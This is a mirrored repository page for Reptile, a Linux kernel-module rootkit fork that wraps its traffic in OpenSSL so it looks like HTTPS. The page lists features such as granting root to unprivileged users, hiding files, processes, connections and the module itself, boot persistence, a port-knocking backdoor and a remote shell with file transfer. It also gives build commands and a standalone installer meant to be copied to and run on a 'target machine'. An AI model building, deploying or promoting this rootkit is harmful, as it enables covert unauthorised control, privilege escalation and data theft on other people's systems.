Giters

AnthraX1 / Reptile

LKM Linux rootkit

Repository from Github https://github.comAnthraX1/ReptileRepository from Github https://github.comAnthraX1/Reptile

Reptile











OpenSSL fork

This fork is aimed at adding a layer of OpenSSL so traffic between two devices is appropriately disguised as HTTPS communication. There is no attempt to use OpenSSL to add security on top of the PEL transport layer already included in Reptile. OpenSSL is used solely to disguise traffic.

Tested on

Debian 9: 4.9.0-8-amd64
Debian 10: 4.19.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 8: 4.18.0-147.5.1.el8_1.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide himself
  • Hide TCP/UDP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)
  • Standalone installer (avoids compiling on target machine)

Install

apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/AnthraX1/Reptile.git
cd Reptile
make menuconfig           # or 'make config' or even 'make defconfig'
make
make install

Standalone installer

Get a VM environment as close to target as possible, ie, same distro and version, same/very close kernel versions

apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/AnthraX1/Reptile.git
cd Reptile
make menuconfig           # or 'make config' or even 'make defconfig'
make
make gen_installer

Copy payload_installer.sh to the target machine.

chmod +x payload_installer.sh
./payload_installer.sh

More details about the installation see Wiki

Uninstall

When you got a sucessfully installation, the way to remove that will be shown in the screen

Usage

See Wiki to usage details. So, read the fucking manual before opening an issue!

Warning

Some functions of this module is based on another rootkits. Please see the references!

References

Thanks

Special thanks to my friend Ilya V. Matveychikov for the KHOOK framework and kmatryoshka loader.

Disclaimer

If you wanna more information, send me an e-mail: f0rb1dd3n@tuta.io

About

LKM Linux rootkit

Languages

Language:C 73.2%Language:C++ 13.5%Language:Yacc 4.4%Language:Makefile 4.1%Language:Perl 2.1%Language:Shell 2.0%Language:Lex 0.6%Language:Assembly 0.1%